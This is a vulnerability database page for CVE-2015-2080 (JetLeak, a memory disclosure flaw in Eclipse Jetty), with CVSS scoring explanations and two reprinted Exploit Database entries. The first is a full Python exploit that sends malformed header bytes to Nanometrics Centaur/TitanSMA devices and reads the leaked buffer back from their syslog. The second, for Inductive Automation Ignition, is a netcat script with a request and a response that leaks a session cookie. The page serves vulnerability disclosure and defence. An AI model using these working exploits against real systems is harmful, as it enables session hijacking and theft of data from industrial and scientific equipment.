CVE-2015-2080 : Detail

CVE-2015-2080

7.5
/
High
A01-Broken Access Control
87.21%V3
Network
2016-10-07
12h00 +00:00
2019-03-08
09h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.

Metrics

Metrics Score Severity CVSS Vector Source
V3.0 7.5 HIGH CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Network

A vulnerability exploitable with network access means the vulnerable component is bound to the network stack and the attacker's path is through OSI layer 3 (the network layer). Such a vulnerability is often termed 'remotely exploitable' and can be thought of as an attack being exploitable one or more network hops away (e.g. across layer 3 boundaries from routers).

Attack Complexity

This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success against the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files to carry out an attack.

User Interaction

This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component.

None

The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics

An important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges.

Scope

Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports.

Unchanged

An exploited vulnerability can only affect resources managed by the same authority. In this case the vulnerable component and the impacted component are the same.

Base: Impact Metrics

The Impact metrics refer to the properties of the impacted component.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

None

There is no loss of integrity within the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

None

There is no impact to availability within the impacted component.

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability.

Environmental Metrics

 [email protected]
V2 5 AV:N/AC:L/Au:N/C:P/I:N/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 48098

Publication date : 2020-02-18
23h00 +00:00
Author : byteGoblin
EDB Verified : No

# Exploit Title: Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak # Date: 2020-02-15 # Author: byteGoblin # Vendor: https://www.nanometrics.ca # Product: https://www.nanometrics.ca/products/accelerometers/titan-sma # Product: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder # CVE: N/A # # Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit # # # Vendor: Nanometrics Inc. # Product page: https://www.nanometrics.ca/products/accelerometers/titan-sma # Product page: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder # # Affected versions: # Centaur <= 4.3.23 # TitanSMA <= 4.2.20 # # Summary: # The Centaur Digital Recorder is a portable geophysical sensing acquisition system that consists # of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities. # Its ease of use simplifies high performance geophysical sensing deplayments in both remote and # networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for # infrasound and similar geophysical sensor recording applications requiring sample rates up to # 5000 sps. # # Summary: # The TitanSMA is a strong motion accelerograph designed for high precision observational and # structural engineering applications, where scientists and engineers require exceptional dynamic # range over a wide frequency band. # # Description: # An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect # critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT) # suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224. # As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage. # Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP # packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system # logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent # packet) which can be combined to leak sensitive data which can be used to perform session hijacking # and authentication bypass scenarios. # # Tested on: # Jetty 9.4.z-SNAPSHOT # # Vulnerability discovered by: # byteGoblin @ zeroscience.mk # # # Advisory ID: ZSL-2020-5562 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php # # Related CVE: CVE-2015-2080 # Related CWE: CWE-532, CWE-538 # # 10.02.2020 # #!/usr/bin/env python3 import requests import re import sys class Goblin: def __init__(self): self.host = None self.page = "/zsl" self.syslog = "/logs/syslog" self.buffer_pad = "A" * 70 self.buffer = None self.payload = "\xFF" self.payloads_to_send = 70 # 70 seems to be a good number before we get weird results self.body = {} self.headers = None self.syslog_data = {} self.last_line = None self.before_last_line = True def banner(self): goblin = """ NN NkllON 0;;::k000XN KxllokN 0;,:,;;;;:ldK Kdccc::oK Nx,';codddl:::dkdc:c:;lON klc:clloooooooc,.':lc;'lX x;:ooololccllc:,:ll:,:xX Kd:cllc'..';:ccclc,.x _ . ___ _ . NOoc::c:,'';:ccllc::''k \ ___ , . _/_ ___ .' \ __. \ ___ | ` , __ Nklc:clccc;.;odoollc:',xN |/ \ | ` | .' ` | .' \ |/ \ | | |' `. 0l:lollc:;:,.,ccllcc:;..cOKKX | ` | | | |----' | _ | | | ` | | | | 0c;lolc;'...',;;:::::;..:cc:,cK `___,' `---|. \__/ `.___, `.___| `._.' `___,' /\__ / / | Nc'clc;..,,,:::c:;;;,'..:oddoc;c0 \___/ Nl';;,:,.;:,;:;;;,'.....cccc:;..x InTrOdUcEs: //Nano-Bleed// XxclkXk;'::,,,''';:::;'''...'',:o0 Kl,''',:cccccc:;..';;;:cc;;dX Discovered / Created by: byteGoblin O,.,;;,;:::::;;,,;::,.';:c';K contact: bytegoblin <at> zeroscience.mk Kdcccccdl'';;..'::;;,,,;:::;,'..;:.;K d;,;;'...',,,:,..,;,',,;;,,,'.cd,':.;K Vendor: Nanometrics Inc. - nanometrics.ca Oddl',,'',:cxX0:....'',,''..;dKKl,;,,xN Product: Centaur, TitanSMA d...'ckN Xkl:,',:clll:,..,cxd;,::,,xN Affected versions: <= 4.3.23, <= 4.3.20 0:',';k Xx:,''..,cccc::c:'.';:;..,;,lK 0:'clc':o;',;,,.';loddolc;'.,cc'.;olkN CVE: N/A 0:'cdxdc,..';..,lOo,:clc:'.,:ccc;.oN Advisory: ZSL-2020-5562 / zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php :,;okxdc,..,,..lK Xkol;:x0kl;;::;':0 x:,:odo:,'.',,.'xN 0lk Nk;';:;.cN Description: Unauthenticated Remote Memory Leak in Nanometrics Centaur product Xx:,'':xk:..,''lK Y k;';;';xX XOkkko'.....'O d.';;,,:xN 0dooooooxX x'.'''',oK _.o-'( Shout-out to the bois: LiquidWorm, 0nyxd, MemeQueen, Vaakos, Haunt3r )'-o._ XOkkkkkON """ print(goblin) def generate_payload(self, amount_of_bytes): self.payload += "\x00" * amount_of_bytes self.headers = {"Cookie": self.buffer_pad, "Referer": self.payload} def read_syslog(self, initial=False): # Read syslog remotely and filter out 'HeapByteBuffer' messages. # 'initial' is used to make a 'snapshot' of the state before we send payloads... # That way we can filter on what we've just sent. print("[!] - Grabbing syslog from: {}{}".format(self.host, self.syslog)) buffer = "" r = requests.get(self.host + self.syslog) if r.status_code == 200: print("[!] - We got syslog, it is: {} bytes".format(len(r.content))) split = r.text.split("\n") for line in split: if "HeapByteBuffer" in line: if initial: self.last_line = line else: if line == self.last_line: self.before_last_line = False if not self.before_last_line: buffer_addr = re.search("\@\w+", line).group(0).strip("@") try: leak = re.search(">>>.+(?=\.\.\.)", line).group(0).strip(">>>") buffer += leak except Exception as e: print(e) if initial: return self.last_line self.buffer = buffer else: # we can't access syslog? print("[!!!] - Yoooo... we can't access syslog? Make sure you can access it, dawg...") print("[!!!] - The status code we got was: {}".format(r.status_code)) exit(-1) def show_output(self): # we need to translate '\r\n' into actual newlines if self.buffer is not None and self.buffer is not "": self.buffer = self.buffer.replace("\\n", "\n") self.buffer = self.buffer.replace("\\r", "\r") self.buffer = self.buffer.replace("%2f", "/") print("[*] BUFFER LENGTH: {}".format(len(self.buffer))) print("=" * 50) print("[*] THIS IS THE LOOT") print("=" * 50) for num, x in enumerate(self.buffer.split("\n")): print("{}.\t| \t{}".format(num, x)) def send_payload(self, amount): print("[!] - Sending payloads to target: {}{}".format(self.host, self.page)) if amount > self.payloads_to_send or amount < 0: amount = self.payloads_to_send for num, x in enumerate(range(0, amount)): if num % 10 == 0: print("[!] - [{}/{}] payloads sent...".format(num, amount)) try: self.generate_payload(17) r = requests.post(self.host + self.page, data=self.body, headers=self.headers) except Exception as e: print(e) print("[!] - [{}/{}] payloads sent...".format(amount, amount)) def parse_sys_args(self): if len(sys.argv) >= 2: self.host = sys.argv[1] if not "http" in self.host: self.host = "http://{}".format(self.host) if len(sys.argv) == 3: # amount of packets to send self.payloads_to_send = sys.argv[2] else: self.print_help() def print_help(self): print("Usage: {} <ip_addr[:port]> [amount of payloads to send]".format(sys.argv[0])) print("Example: centaur3.py 123.456.789.0:8080 200") print("\tThis will send 200 payloads to the aforementioned host") print("\tThe [port] and [amount of payloads] are optional") exit(-1) def main(self): self.parse_sys_args() self.banner() ll = self.read_syslog(initial=True) self.send_payload(70) self.read_syslog() self.show_output() if __name__ == '__main__': Goblin().main()
Exploit Database EDB-ID : 39455

Publication date : 2016-02-16
23h00 +00:00
Author : LiquidWorm
EDB Verified : No

Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers Vendor: Inductive Automation Product web page: http://www.inductiveautomation.com Affected version: 7.8.1 (b2016012216) and 7.8.0 (b2015101414) Platform: Java Summary: Ignition is a powerful industrial application platform with fully integrated development tools for building SCADA, MES, and IIoT solutions. Desc: Remote unauthenticated atackers are able to read arbitrary data from other HTTP sessions because Ignition uses a vulnerable Jetty server. When the Jetty web server receives a HTTP request, the below code is used to parse through the HTTP headers and their associated values. The server begins by looping through each character for a given header value and checks the following: - On Line 1164, the server checks if the character is printable ASCII or not a valid ASCII character. - On Line 1172, the server checks if the character is a space or tab. - On Line 1175, the server checks if the character is a line feed. - If the character is non-printable ASCII (or less than 0x20), then all of the checks above are skipped over and the code throws an ëIllegalCharacterí exception on line 1186, passing in the illegal character and a shared buffer. --------------------------------------------------------------------------- File: jetty-http\src\main\java\org\eclipse\jetty\http\HttpParser.java --------------------------------------------------------------------------- 920: protected boolean parseHeaders(ByteBuffer buffer) 921: { [..snip..] 1163: case HEADER_VALUE: 1164: if (ch>HttpTokens.SPACE || ch<0) 1165: { 1166: _string.append((char)(0xff&ch)); 1167: _length=_string.length(); 1168: setState(State.HEADER_IN_VALUE); 1169: break; 1170: } 1171: 1172: if (ch==HttpTokens.SPACE || ch==HttpTokens.TAB) 1173: break; 1174: 1175: if (ch==HttpTokens.LINE_FEED) 1176: { 1177: if (_length > 0) 1178: { 1179: _value=null; 1180: _valueString=(_valueString==null)?takeString():(_valueString+" "+takeString()); 1181: } 1182: setState(State.HEADER); 1183: break; 1184: } 1185: 1186: throw new IllegalCharacter(ch,buffer); --------------------------------------------------------------------------- Tested on: Microsoft Windows 7 Professional SP1 (EN) Microsoft Windows 7 Ultimate SP1 (EN) Ubuntu Linux 14.04 Mac OS X HP-UX Itanium Jetty(9.2.z-SNAPSHOT) Java/1.8.0_73 Java/1.8.0_66 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5306 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php CVE: CVE-2015-2080 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2080 Original: http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html Jetleak Test script: https://github.com/GDSSecurity/Jetleak-Testing-Script/blob/master/jetleak_tester.py Eclipse: http://git.eclipse.org/c/jetty/org.eclipse.jetty.project.git/plain/advisories/2015-02-24-httpparser-error-buffer-bleed.md https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md 14.01.2016 --- ####################### #!/bin/bash #RESOURCEPATH="/main/web/config/alarming.schedule?4674-1.IBehaviorListener.0-demo" RESOURCEPATH="/main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo" BAD=$'\a' function normalRequest { echo "-- Normal Request --" nc localhost 8088 << NORMREQ POST $RESOURCEPATH HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded;charset=utf-8 Connection: close Content-Length: 63 NORMREQ } function badCookie { echo "-- Bad Cookie --" nc localhost 8088 << BADCOOKIE GET $RESOURCEPATH HTTP/1.1 Host: localhost Coo${BAD}kie: ${BAD} BADCOOKIE } normalRequest echo "" echo "" badCookie ####################### Original raw analysis request via proxy using Referer: ------------------------------------------------------ GET /main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo&_=1452849939485 HTTP/1.1 Host: localhost:8088 Accept: application/xml, text/xml, */*; q=0.01 X-Requested-With: XMLHttpRequest Wicket-Ajax: true User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36 Wicket-Ajax-BaseURL: config/conf.modules?51461 Referer: \x00 Response leaking part of Cookie session: ---------------------------------------- HTTP/1.1 400 Illegal character 0x0 in state=HEADER_VALUE in 'GET /main/web/con...461\r\nReferer: \x00<<<\r\nAccept-Encoding...tion: close\r\n\r\n>>>SESSIONID=15iwe0g...\x0fCU\xFa\xBf\xA4j\x12\x83\xCb\xE61~S\xD1' Content-Length: 0 Connection: close Server: Jetty(9.2.z-SNAPSHOT)

Products Mentioned

Configuraton 0

Fedoraproject>>Fedora >> Version 22

Configuraton 0

Eclipse>>Jetty >> Version 9.2.3

Eclipse>>Jetty >> Version 9.2.4

Eclipse>>Jetty >> Version 9.2.5

Eclipse>>Jetty >> Version 9.2.6

Eclipse>>Jetty >> Version 9.2.7

Eclipse>>Jetty >> Version 9.2.8

Eclipse>>Jetty >> Version 9.3.0

    Eclipse>>Jetty >> Version 9.3.0

      References

      http://seclists.org/fulldisclosure/2015/Mar/12
      Tags : mailing-list, x_refsource_FULLDISC
      http://www.securityfocus.com/bid/72768
      Tags : vdb-entry, x_refsource_BID
      http://www.securitytracker.com/id/1031800
      Tags : vdb-entry, x_refsource_SECTRACK